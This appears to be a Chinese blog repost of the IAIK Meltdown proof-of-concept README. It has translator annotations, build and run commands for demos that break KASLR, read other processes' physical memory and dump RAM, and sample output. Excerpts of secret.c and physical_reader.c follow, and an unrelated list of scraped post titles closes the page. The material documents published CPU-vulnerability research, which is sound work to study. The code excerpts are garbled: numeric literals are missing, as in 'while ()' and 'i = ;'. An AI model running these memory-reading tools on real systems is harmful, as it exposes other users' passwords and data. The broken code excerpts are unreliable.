转:Meltdown Proof-of-Concept
转:https://github.com/IAIK/meltdown
Meltdown Proof-of-Concept
What is the difference between Meltdown and Spectre?
Meltdown breaks the mechanism that keeps applications from accessing arbitrary system memory. Consequently, applications can access system memory. Spectre tricks other applications into accessing arbitrary locations in their memory. Both attacks use side channels to obtain the information from the accessed memory location. For a more technical discussion we refer to the papers (Meltdown and Spectre).
meltdown可以访问系统内存;Spectre跨进程访问。
This repository contains several applications, demonstrating the Meltdown bug. For technical information about the bug, refer to the paper:
- Meltdown by Lipp, Schwarz, Gruss, Prescher, Haas, Mangard, Kocher, Genkin, Yarom, and Hamburg
The applications in this repository are built with libkdump,(meltdown核心实现代码:物理地址与虚拟地址相互转换;读取虚拟地址数据) a library we developed for the paper. This library simplifies exploitation of the bug by automatically adapting to certain properties of the environment.
Videos
This repository contains several videos demonstrating Meltdown
- Video #1 shows how Meltdown can be used to spy in realtime on a password input.跨进程读取,泄露密码
- Video #2 shows how Meltdown leaks physical memory content.读取物理内存
- Video #3 shows how Meltdown reconstructs a photo from memory.照片恢复
- Video #4 shows how Meltdown reconstructs a photo from memory which is encoded with the FLIF file format.
- Video #5 shows how Meltdown leaks uncached memory.未缓存,其它进程的?
Demos
This repository contains five demos to demonstrate different use cases. All demos are tested on Ubuntu 16.04 with an Intel Core i7-6700K, but they should work on any Linux system with any modern Intel CPU since 2010.
For best results, we recommend a fast CPU that supports Intel TSX (e.g. any Intel Core i7-5xxx, i7-6xxx, or i7-7xxx). Furthermore, every demo should be pinned to one CPU core, e.g. with taskset.
Build dependency for demos
As a pre-requisite, you need to install glibc-static on your machine.
For RPM-based systems(ubuntu系统省略这一步,centos/fedora需要做):
sudo yum install -y glibc-static
Demo #1: A first test (test
)
This is the most basic demo. It uses Meltdown to read accessible addresses from the own address space, not breaking any isolation mechanisms.
If this demo does not work for you, the remaining demos most likely won't work either. The reasons are manifold, e.g., the CPU could be too slow, not support out-of-order execution, the high-resolution timer is not precise enough (especially in VMs), the operating system does not support custom signal handlers, etc.
Build and Run
make
taskset 0x1 ./test
If you see an output similar to this
Expect: Welcome to the wonderful world of microarchitectural attacks
Got: Welcome to the wonderful world of microarchitectural attacks
then the basic demo works.
Demo #2: Breaking KASLR (kaslr
)
Starting with Linux kernel 4.12, KASLR (Kernel Address Space Layout Randomizaton) is active by default. This means, that the location of the kernel (and also the direct physical map which maps the entire physical memory) changes with each reboot.
This demo uses Meltdown to leak the (secret) randomization of the direct physical map. This demo requires root privileges to speed up the process. The paper describes a variant which does not require root privileges.
Build and Run
make
sudo taskset 0x1 ./kaslr
After a few seconds, you should see something similar to this
[+] Direct physical map offset: 0xffff880000000000(虚拟机几乎一样)
Demo #3: Reliability test (reliability
)
This demo tests how reliable physical memory can be read. For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr
in your kernel command line.
Build and Run
Build and start reliability
. If you have KASLR enabled, the first parameter is the offset of the direct physical map. Otherwise, the program does not require a parameter.
make
sudo taskset 0x1 ./reliability 0xffff880000000000
After a few seconds, you should get an output similar to this:
[-] Success rate: 99.93% (read 1354 values)
Demo #4: Read physical memory (physical_reader
)
This demo reads memory from a different process by directly reading physical memory. For this demo, you either need the direct physical map offset (e.g. from demo #2) or you have to disable KASLR by specifying nokaslr
in your kernel command line.
In principal, this program can read arbitrary physical addresses. However, as the physical memory contains a lot of non-human-readable data, we provide a test tool (secret
), which puts a human-readable string into memory and directly provides the physical address of this string.
Build and Run
For the demo, first run secret
(as root) to get the physical address of a human-readable string:
make
sudo ./secret
It should output something like this:(演示跨进程读取字符串,secret运行一个进程,在某个地址存储字符串,并显示该物理地址;后面的physical_reader作为另外一个进程尝试读取secret)
[+] Secret: If you can read this, this is really bad
[+] Physical address of secret: 0x390fff400
[+] Exit with Ctrl+C if you are done reading the secret
Let the secret
program running, and start physical_reader
. The first parameter is the physical address printed by secret
. If you do not have KASLR disabled, the second parameter is the offset of the direct physical map.
taskset 0x1 ./physical_reader 0x390fff400 0xffff880000000000
After a few seconds, you should get an output similar to this:
[+] Physical address : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Reading virtual address: 0xffff880390fff400
If you can read this, this is really bad
Demo #5: Dump the memory (memdump
)
This demo dumps the content of the memory. As demo #3 and #4, it uses the direct physical map, to dump the contents of the physical memory in a hexdump-like format.
Again, as the physical memory contains a lot of non-human-readable content, we provide a test tool to fill large amounts of the physical memory with human-readable strings.
Build and Run
For the demo, first run memory_filler
to fill the memory with human-readable strings. The first argument is the amount of memory (in gigabytes) to fill.
make
./memory_filler 9
Then, run the memdump
tool to dump memory contents. If you executed memory_filler
before, you should see some string fragments. If you have Firefox or Chrome with multiple tabs running, you might also see parts of the websites which are open or were recently closed.
The first parameter is the physical address at which the dump should begin (leave empty to start at the first gigabyte). The second parameter is the amount of bytes you want to be read, to read it all give -1. If you do not have KASLR disabled, the third parameter is the offset of the direct physical map.
taskset 0x1 ./memdump 0x240000000 -1 0xffff880000000000 # start at 9 GB
You should get a hexdump of parts of the memory (potentially even containing secrets such as passwords, see example in the paper), e.g.:
240001c9f: | 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .m.............. |
24000262f: | 00 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .}.............. |
24000271f: | 00 00 00 00 00 00 00 00 00 00 00 00 65 6e 20 75 | ............en u |
24000272f: | 73 65 72 20 73 70 61 63 65 20 61 6e 64 20 6b 65 | ser space and ke |
24000273f: | 72 6e 65 6c 57 65 6c 63 6f 6d 65 20 74 6f 20 74 | rnelWelcome to t |
24000298f: | 00 61 72 79 20 62 65 74 77 65 65 6e 20 75 73 65 | .ary between use |
24000299f: | 72 20 73 70 61 63 65 20 61 6e 64 20 6b 65 72 6e | r space and kern |
2400029af: | 65 6c 42 75 72 6e 20 61 66 74 65 72 20 72 65 61 | elBurn after rea |
2400029bf: | 64 69 6e 67 20 74 68 69 73 20 73 74 72 69 6e 67 | ding this string |
240002dcf: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 | ................ |
2400038af: | 6a 75 73 74 20 73 70 69 65 64 20 6f 6e 20 61 00 | just spied on a. |
240003c8f: | 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
24000412f: | 00 00 00 00 00 00 00 00 00 00 00 00 65 74 73 2e | ............ets. |
24000413f: | 2e 2e 57 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 | ..Welcome to the |
2400042ff: | 00 00 00 00 00 00 00 00 00 6e 67 72 61 74 75 6c | .........ngratul |
24000430f: | 61 74 69 6f 6e 73 2c 20 79 6f 75 20 6a 75 73 74 | ations, you just |
24000431f: | 20 73 70 69 65 64 20 6f 6e 20 61 6e 20 61 70 70 | spied on an app |
Frequently Asked Questions
Does it work on Windows / Ubuntu on Windows (WSL) / Mac OS?
No. This PoC only works on Linux, as it uses properties specific to the Linux kernel, such as the direct physical map.
Can I run the PoC in a virtual machine?(虚拟层是否有影响?)
Yes, the PoC also works on virtual machines. However, due to the additional layer introduced by a virtual machine, it might not work as good as on native hardware.
The KASLR program (
kaslr
) does not find the offset!The
kaslr
tool only does very few measurements to be fast. If it does not find the offset, there are two possibilities:- change the number of retries in
kaslr.c
:config.retries = 1000;
- use the kernel module in
kaslr_offset
to directly read the offset from the kernel. Install the kernel headers for your kernel (sudo apt-get install linux-headers-`uname -r`
) and runsudo ./direct_physical_map.sh
- change the number of retries in
You said it works on uncached memory, but all your demos ensure that the memory is cached!
Making it work on uncached memory is trickier, and often requires a bit of tweaking of the parameters. Thus, we ensure that the memory is cached in the PoC to make it easier to reproduce. However, you can simply remove the code that caches the values and replace it by a
clflush
to test the exploit on uncached memory (see Video #5 for an example). Although not in the original blog post by Google, this was also confirmed by independent researchers (e.g. Alex Ionescu, Raphael Carvalho, Pavel Boldin).It just does not work on my computer, what can I do?
There can be a lot of different reasons for that. We collected a few things you can try:
- Ensure that your CPU frequency is at the maximum, and frequency scaling is disabled.
- If you run it on a mobile device (e.g., a laptop), ensure that it is plugged in to get the best performance.
- Try to pin the tools to a specific CPU core (e.g. with taskset). Also try different cores and core combinations.
- Vary the load on your computer. On some machines it works better if the load is higher, on others it works better if the load is lower.
- Try to disable hyperthreading in the BIOS. On some computers it works a lot better if hyperthreading is disabled.
- Use a different variant of Meltdown. This can be changed in
libkdump/libkdump.c
in the line#define MELTDOWN meltdown_nonull
. Try for examplemeltdown
instead ofmeltdown_nonull
, which works a lot better on some machines (but not at all on others). - Try to create many interrupts, e.g. by running the tool
stress
withstress -i 2
(or other values for thei
parameter, depending on the number of cores). - Try to restart the demos and also your computer. Especially after a standby, the timing are broken on some computers.
- Play around with the parameters of libkdump, e.g. increase the number of retries and/or measurements.
Warnings
Warning #1: We are providing this code as-is. You are responsible for protecting yourself, your property and data, and others from any risks caused by this code. This code may cause unexpected and undesirable behavior to occur on your machine. This code may not detect the vulnerability on your machine.
Warning #2: If you find that a computer is susceptible to the Meltdown bug, you may want to avoid using it as a multi-user system. Meltdown breaches the CPU's memory protection. On a machine that is susceptible to the Meltdown bug, one process can read all pages used by other processes or by the kernel.
Warning #3: This code is only for testing purposes. Do not run it on any productive systems. Do not run it on any system that might be used by another person or entity.
- 主要代码分析:整个过程就是,secret在A地址存储字符串,然后将虚拟地址A转换为物理地址B。physical_reader将B转换为其虚拟地址C,然后从C开始循环读取。
- secret关键代码:
const char *secret = strings[rand() % (sizeof(strings) / sizeof(strings[]))];//随机选择一个字符串
int len = strlen(secret);
...
size_t paddr = libkdump_virt_to_phys((size_t)secret);//虚拟地址到物理地址映射
...
while () {
// keep string cached for better results
volatile size_t dummy = , i;
for (i = ; i < len; i++) {
dummy += secret[i];
}
sched_yield();
}
2.physical_reader.c
size_t vaddr = libkdump_phys_to_virt(phys);//物理地址到虚拟地址影射 printf("\x1b[32;1m[+]\x1b[0m Physical address : \x1b[33;1m0x%zx\x1b[0m\n", phys);
printf("\x1b[32;1m[+]\x1b[0m Physical offset : \x1b[33;1m0x%zx\x1b[0m\n", config.physical_offset);
printf("\x1b[32;1m[+]\x1b[0m Reading virtual address: \x1b[33;1m0x%zx\x1b[0m\n\n", vaddr); while () {
int value = libkdump_read(vaddr);//从虚拟地址读取该值,注意libkdump_read即meltdown核心实现代码
printf("%c", value);
fflush(stdout);//使stdout清空,就会立刻输出所有在缓冲区的内容
vaddr++;//循环读取
}
转:Meltdown Proof-of-Concept的更多相关文章
- Golang之chan/goroutine(转)
原文地址:http://tchen.me/posts/2014-01-27-golang-chatroom.html?utm_source=tuicool&utm_medium=referra ...
- Symbiont
http://www.weiyangx.com/209230.html Symbiont,Credit Suisse与R3携手革新贷款数据验证环节Symbiont, Credit Suisse and ...
- supercool.sh文件里,有哪些恶意的命令
当你在一个bash命令行中输入"*"时,bash会扩展到当前目录的所有文件,然后将他们全部作为参数传递给程序.例如:rm *,将会删除掉当前目录的所有文件. 0x01 文件名被当做 ...
- ZTE and TP-Link RomPager - DoS Exploit
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: ZTE and TP-Link RomPager DoS Exploit ...
- (转) Awesome Deep Learning
Awesome Deep Learning Table of Contents Free Online Books Courses Videos and Lectures Papers Tutori ...
- How Google Tests Software - The Life of a TE
By James WhittakerThe Test Engineer is a newerrole within Google than either SWEs or SETs. As such, ...
- GPU keylogger && GPU Based rootkit(Jellyfish rootkit)
catalog . OpenCL . Linux DMA(Direct Memory Access) . GPU rootkit PoC by Team Jellyfish . GPU keylogg ...
- Linux Overflow Vulnerability General Hardened Defense Technology、Grsecurity/PaX
Catalog . Linux attack vector . Grsecurity/PaX . Hardened toolchain . Default addition of the Stack ...
- setjmp()、longjmp() Linux Exception Handling/Error Handling、no-local goto
目录 . 应用场景 . Use Case Code Analysis . 和setjmp.longjmp有关的glibc and eglibc 2.5, 2.7, 2.13 - Buffer Over ...
- ASP.NET Padding Oracle Attack EXP
#!/usr/bin/perl## PadBuster v0.3 - Automated script for performing Padding Oracle attacks# Brian Hol ...
随机推荐
- cmd窗口关闭 -----window小技巧!
前沿 平时开发的时候经常用到windows 的命令行工具来启动程序 或是 查看本地数据库的信息 : 经常的手动关闭 ,对于我这种,能用键盘完成的就坚决不用鼠标的人是多么痛苦. 所以在此罗列了一些命 ...
- LightOJ 1239 - Convex Fence 凸包周长
LINK 题意:类似POJ的宫殿围墙那道,只不过这道题数据稍微强了一点,有共线的情况 思路:求凸包周长加一个圆周长 /** @Date : 2017-07-20 15:46:44 * @FileNam ...
- .net core 中 identity server 4 之术语
id4的职责: 保护你的资源 通过本地 账户库(Account Store)或者外部身份提供其 认证用户 提供Session管理以及SSO 管理和认证客户端 发行身份及访问Token给客户端 验证To ...
- Try finally的一个实验和为什么避免重载 finalize()方法--例子
public class TryFinallTest { public TryFinallTest(){ } public void runSomething(String str){ System. ...
- 51nod 1074 约瑟夫环 V2
N个人坐成一个圆环(编号为1 - N),从第1个人开始报数,数到K的人出列,后面的人重新从1开始报数.问最后剩下的人的编号. 例如:N = 3,K = 2.2号先出列,然后是1号,最后剩下的是3号. ...
- 【BZOJ】1426: 收集邮票 期望DP
[题意]有n种不同的邮票,第i次可以花i元等概率购买到一种邮票,求集齐n种邮票的期望代价.n<=10^4. [算法]期望DP [题解]首先设g[i]表示已拥有i张邮票集齐的期望购买次数,根据全期 ...
- Mac 下安装 ruby 环境解决 brew 安装 yarn 问题
在brew安装yarn提示 ruby的版本过低.在网上搜了一下发现 1. mac下自带的ruby 在 system 目录下 2. 其实可以用brew安装一个ruby brew install ruby ...
- Struts结果跳转方式(四种result配置)
1.转发(默认转发)
- 75.VS2013和opencv3.1.0开发环境配置
首先要做的就是 开发环境配置,具体过程如下: Step 1:OpenCV环境变量配置 我的电脑--->属性--->高级系统设置--->高级--->环境变量--->系统变量 ...
- 用dom4j操作xml文件
XML的全称是eXtensible Markup Language,即“可扩展标记语言”.XML文件的作用主要是数据存储,文件配置,数据传输. html与xml的区别是:①html语法松散,xml语法 ...